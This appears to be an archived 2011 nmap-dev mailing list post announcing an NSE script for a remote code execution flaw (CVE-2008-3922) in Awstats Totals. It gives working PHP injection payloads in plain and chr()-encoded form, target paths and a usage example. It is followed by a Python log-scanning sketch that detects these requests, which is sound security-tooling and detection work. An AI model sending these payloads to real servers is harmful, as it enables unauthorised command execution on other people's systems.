Nmap Development mailing list archives
http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14
From: Paulino Calderon <paulino () calderonpale com>
Date: Mon, 11 Jul 2011 02:43:40 -0700
Hi nmap-dev,

description = [[
http-awstatstotals-exec exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it. It works on PHP4 and PHP5 with magic quotes enabled. [CVE: 2008-3922]

Stealth mode encodes the command string using PHP's chr() function. Ex.
* Normal mode: <code>?sort={%24{passthru%28$_GET[CMD]%29}}{%24{exit%28%29}}&CMD=uname%20-a</code>
* Stealth mode: <code>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</code>

Common paths for Awstats Total:
* /awstats/index.php
* /awstatstotals/index.php
* /awstats/awstatstotals.php
]]

---
-- @usage
-- nmap --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.stealth, http-awstatstotals-exec.uri=/awstats/index.php' -p80 <host/ip>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- |_http-awstatstotals-exec.nse: Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
--
-- @args http-awstatstotals-exec.uri Awstats Totals URI including path
-- @args http-awstatstotals-exec.cmd Command to execute
-- @args http-awstatstotals-exec.stealth Stealth mode encodes command payload using PHP's chr()
-- @args http-awstatstotals-exec.outfile Output file
---

--
Paulino Calderón Pale
Web: http://calderonpale.com
Twitter: http://www.twitter.com/paulinocaIderon
Attachment:
http-awstatstotals-exec.nse
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
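A log-review sketch for the two request forms described in the message above, added here as an example and not part of the posted script: it flags `sort` values carrying PHP `{${...}}` syntax and decodes a chr() chain back to the command that was sent. The access-log lines are constructed, and treating a legitimate `sort` value as a single plain word is an assumption.

```python
import re
from urllib.parse import parse_qs

# Constructed sample access-log lines (combined log format); the two
# flagged requests reuse the query strings quoted in the message above.
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Jul/2011:02:43:40 -0700] "GET /awstats/index.php?sort=pages&month=07 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [11/Jul/2011:02:44:02 -0700] "GET /awstats/index.php?sort={%24{passthru%28$_GET[CMD]%29}}{%24{exit%28%29}}&CMD=uname%20-a HTTP/1.1" 200 87',
    '198.51.100.9 - - [11/Jul/2011:02:44:09 -0700] "GET /awstatstotals/index.php?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}} HTTP/1.1" 200 87',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SAFE_SORT = re.compile(r'^\w*$')          # assumption: sort is one plain word
PHP_CURLY = re.compile(r'\{\s*\$\s*\{')   # "{${" complex-variable syntax
CHR_CALL = re.compile(r'chr\((\d{1,3})\)', re.I)

def decode_chr_chain(value):
    """Recover the text hidden in a chr(N).chr(N)... chain ('' if none)."""
    return ''.join(chr(int(n)) for n in CHR_CALL.findall(value))

def inspect_line(line):
    """Return a finding dict for a suspicious 'sort' parameter, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    path, _, query = m.group(1).partition('?')
    params = parse_qs(query, keep_blank_values=True)  # also URL-decodes
    for sort in params.get('sort', []):
        if SAFE_SORT.match(sort):
            continue
        if PHP_CURLY.search(sort):
            kind = 'stealth-mode' if CHR_CALL.search(sort) else 'normal-mode'
        else:
            kind = 'unexpected-characters'
        # Stealth requests embed the command; normal ones pass it in CMD.
        command = decode_chr_chain(sort) or ' '.join(params.get('CMD', []))
        return {'path': path, 'kind': kind, 'command': command}
    return None

def scan(lines):
    """Inspect every log line and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
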
Current thread:
- http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14 Paulino Calderon (Jul 11)
- Re: http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14 Toni Ruottu (Jul 11)
- Re: http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14 Paulino Calderon (Jul 15)